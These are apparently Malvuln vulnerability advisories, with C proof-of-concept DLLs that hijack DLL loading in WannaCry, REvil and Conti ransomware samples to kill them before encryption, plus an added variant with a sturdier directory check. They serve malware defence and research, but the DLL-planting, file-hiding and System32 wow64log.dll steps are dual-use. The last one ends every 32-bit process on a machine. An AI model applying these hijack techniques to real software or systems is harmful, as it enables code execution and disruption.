<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/84c82835a5d21bbcf75a61706d8ab549.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />ISR: ApparitionSec<br /><br />Threat: Ransom.WannaCry<br />Vulnerability: Code Execution<br />Description: WannaCry looks for and executes DLLs in its current directory. Therefore, we can hijack a vulnerable DLL, execute our own code, and control and terminate the malware pre-encryption. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products; the malware's flaw does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective, you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: WannaCry<br />Type: PE32<br />MD5: 84c82835a5d21bbcf75a61706d8ab549<br />Vuln ID: MVID-2022-0582<br />Disclosure: 05/03/2022<br />Video PoC URL: https://www.youtube.com/watch?v=AXD8Lo2jCc0<br /><br />Exploit/PoC:<br />1) Compile the following C code as "MSVCP60.dll" 32bit<br />2) Place the DLL in the same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "MSVCP60.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln<br />//Purpose: Code Execution - Block Encryption<br />//Target: Ransom.WannaCry<br />//MD5: 84c82835a5d21bbcf75a61706d8ab549<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c MSVCP60.c -m32<br />//gcc -shared -o MSVCP60.dll MSVCP60.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br />    switch (reason) {<br />    case DLL_PROCESS_ATTACH:<br />        MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br />        TCHAR buf[MAX_PATH];  // ANSI build (no UNICODE), so TCHAR is char and strcmp applies<br />        if(GetCurrentDirectory(MAX_PATH, buf)){  // compare only if the call succeeded; TEXT() is for literals, not buffers<br />            int rc = strcmp("C:\\Windows\\System32", buf);<br />            if(rc != 0){<br />                // GetCurrentProcessId() is the Win32 call; getpid() is undeclared without process.h<br />                HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());<br />                if (NULL != handle) {<br />                    TerminateProcess(handle, 0);<br />                    CloseHandle(handle);<br />                }<br />            }<br />        }<br />        break;<br />    }<br />    return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/979635229dfcfae1aae74ae296ec78c8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: REvil.Ransom<br />Vulnerability: Code Execution<br />Description: REvil looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vulnerable DLL, execute our own code, and control and terminate the malware pre-encryption. The exploit DLL will check whether the current directory is "C:\Windows\System32"; if not, we grab our process ID and terminate. We do not need to rely on a hash signature or third-party product; the malware will do the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective, you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: REvil<br />Type: PE32<br />MD5: 979635229dfcfae1aae74ae296ec78c8<br />SHA256: 03b5a7ffe111cca63fc687a295ba8075087cc90812f6b988797a2d49a5db1482<br />Vuln ID: MVID-2022-0581<br />Disclosure: 05/03/2022<br />Video PoC URL: https://www.youtube.com/watch?v=iN4WaVgEkvs<br /><br />Exploit/PoC:<br />1) Compile the following C code as "netapi32.dll" 32bit<br />2) Place the DLL in the same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br />#include "stdio.h"<br /><br />//By malvuln<br />//Purpose: Code Execution<br />//Target: REvil.Ransom<br />//MD5: 979635229dfcfae1aae74ae296ec78c8<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br />    switch (reason) {<br />    case DLL_PROCESS_ATTACH:<br />        MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br />        TCHAR buf[MAX_PATH];  // ANSI build (no UNICODE), so TCHAR is char and strcmp applies<br />        if(GetCurrentDirectory(MAX_PATH, buf)){  // compare only if the call succeeded; TEXT() is for literals, not buffers<br />            int rc = strcmp("C:\\Windows\\System32", buf);<br />            if(rc != 0){<br />                // GetCurrentProcessId() is the Win32 call; getpid() is undeclared without process.h<br />                HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());<br />                if (NULL != handle) {<br />                    TerminateProcess(handle, 0);<br />                    CloseHandle(handle);<br />                }<br />            }<br />        }<br />        break;<br />    }<br />    return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/3c55ee6753408bff2e3e6a392ed9f2a0.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Conti<br />Vulnerability: Code Execution<br />Description: Conti looks for and loads DLLs from its current directory. Therefore, we can potentially hijack a DLL it expects to find, execute our own code, and control and terminate the malware pre-encryption. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, it opens its own process with PROCESS_TERMINATE rights and terminates it. We do not need to rely on hash signatures or third-party products: the malware's own flaw does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot, as there is nothing to kill; the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Conti<br />Type: PE32<br />MD5: 3c55ee6753408bff2e3e6a392ed9f2a0<br />SHA256: 0b0b902af452e1c949a609a3b29a9de21dac639846c77427de06e6e63c1fe904<br />Vuln ID: MVID-2022-0580<br />Disclosure: 05/03/2022<br />Video PoC URL: https://www.youtube.com/watch?v=H8TDDklcrPo<br /><br />Exploit/PoC:<br />1) Compile the following C code as a 32-bit "netapi32.dll"<br />2) Place the DLL in the same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br />#include "stdio.h"<br />#include "string.h" // strcmp<br /><br />//By malvuln<br />//Purpose: Code Execution<br />//Target: Ransom.Conti<br />//MD5: 3c55ee6753408bff2e3e6a392ed9f2a0<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. 
By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> // Visible proof that our code runs inside the ransomware process<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> // Working directory of the host process (ANSI build, so plain char)<br /> char buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, buf);<br /> // strcmp is case-sensitive and the path is hard-coded to drive C:,<br /> // so only a cwd of exactly "C:\Windows\System32" counts as legitimate<br /> int rc = strcmp("C:\\Windows\\System32", buf);<br /> if(rc != 0){<br /> // Not running from System32: kill the host before it can encrypt<br /> // (GetCurrentProcessId replaces the CRT getpid(); same PID, no extra header)<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /></code></pre>
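The directory check in the two netapi32.dll PoCs above compares the working directory against a hard-coded, case-sensitive "C:\Windows\System32", so a Windows installation on another drive, or a working directory reported in different letter case, defeats it. The following C is an added example (not Malvuln's code) of the same decision made robustly: the system directory is obtained from the OS and both paths are normalized (slashes, case, trailing separator) before comparison. The decision functions normalize_dir, same_directory and should_terminate are this example's own names and are portable, so they can be compiled and unit-tested on any host; the DllMain under #ifdef _WIN32 applies them with GetCurrentDirectoryA, GetSystemDirectoryA and ExitProcess. It keeps the advisories' assumption that the target loads netapi32.dll from its working directory.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Normalize a Windows directory path for comparison:
 *  - forward slashes become backslashes
 *  - letters are lower-cased (NTFS path lookups are case-insensitive)
 *  - a trailing backslash is dropped, except on a bare drive root like "c:\"
 * 'out' is always NUL-terminated; returns the number of characters kept. */
static size_t normalize_dir(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    if (outsz == 0) return 0;
    for (; in[n] != '\0' && n + 1 < outsz; n++) {
        char c = in[n];
        if (c == '/') c = '\\';
        out[n] = (char)tolower((unsigned char)c);
    }
    out[n] = '\0';
    if (n > 3 && out[n - 1] == '\\') {
        out[--n] = '\0';
    }
    return n;
}

/* 1 when 'cwd' and 'sysdir' name the same directory after normalization. */
int same_directory(const char *cwd, const char *sysdir)
{
    char a[260], b[260];  /* MAX_PATH on Windows */
    normalize_dir(cwd, a, sizeof a);
    normalize_dir(sysdir, b, sizeof b);
    return strcmp(a, b) == 0;
}

/* Decision used by the decoy DLL: if the host's working directory is not the
 * real system directory, the DLL was picked up from the malware's own
 * directory and the host process should be killed before it can encrypt. */
int should_terminate(const char *cwd, const char *sysdir)
{
    return !same_directory(cwd, sysdir);
}

#ifdef _WIN32
#include <windows.h>

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved)
{
    (void)hInst; (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
        char cwd[MAX_PATH], sysdir[MAX_PATH];
        /* GetSystemDirectoryA returns e.g. "C:\Windows\system32" on this host,
         * whatever drive Windows was installed on. */
        if (GetCurrentDirectoryA(MAX_PATH, cwd) == 0 ||
            GetSystemDirectoryA(sysdir, MAX_PATH) == 0) {
            ExitProcess(1);  /* cannot tell where we are: fail closed */
        }
        if (should_terminate(cwd, sysdir)) {
            ExitProcess(0);  /* kill the host before its encryption routine */
        }
    }
    return TRUE;
}
#endif
```

Build it the same way as the advisories' PoC, for example `gcc -shared -m32 -o netapi32.dll guard.c` (the source file name is arbitrary). The portable part can be checked on a non-Windows box with a plain `gcc -c guard.c`; ExitProcess is used instead of OpenProcess/TerminateProcess on the current PID because it needs no handle and cannot fail for lack of rights on one's own process.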
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/710a77804637f65e22a2e230ff6444f9.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Conti.Ransom<br />Vulnerability: Code Execution<br />Description: Conti looks for and loads a DLL named "wow64log.dll" from Windows\System32. Therefore, we can drop our own DLL there to intercept and terminate the malware pre-encryption. The exploit DLL simply displays a Win32 API message box and calls exit(). Our Conti.Ransom exploit DLL must export an "InterlockedExchange" function or the load fails with an error. Note that wow64log.dll is loaded by the WoW64 layer into 32-bit processes in general, not only into Conti, so an unconditional exit() in DllMain will terminate any such process; keep this PoC inside a test VM. We do not need to rely on hash signatures or third-party products: the malware's own behaviour does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot, as there is nothing to kill; the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Conti<br />Type: PE32<br />MD5: 710a77804637f65e22a2e230ff6444f9<br />SHA256: 0aaacd11d8b956d317489d060e72946d28ab6aef9be1b541aff9904a750f4b51<br />Vuln ID: MVID-2022-0579<br />Disclosure: 05/03/2022<br />Video PoC URL: https://www.youtube.com/watch?v=owsev3YTkWA<br /><br />Exploit/PoC:<br />1) Compile the following C code as a 64-bit (x64) "wow64log.dll"<br />2) Copy the DLL into Windows\System32<br />3) Run the malware and BOOM!<br /><br />#include "windows.h"<br />#include "stdio.h"<br />#include "stdlib.h" // exit<br /><br />//By malvuln - 5/2022<br />//MD5: 710a77804637f65e22a2e230ff6444f9<br />//TARGET: Conti.Ransom<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. 
By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c wow64log.c <br />//gcc -shared -o wow64log.dll wow64log.o <br />//must live under Windows\System32 (64-bit build)<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> // Visible proof that our code runs inside the loading process<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> // End the host before it reaches its encryption routine<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />// Conti resolves this symbol from wow64log.dll and the load fails without it,<br />// so export a stub; it also ends the process should it ever be called<br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /></code></pre>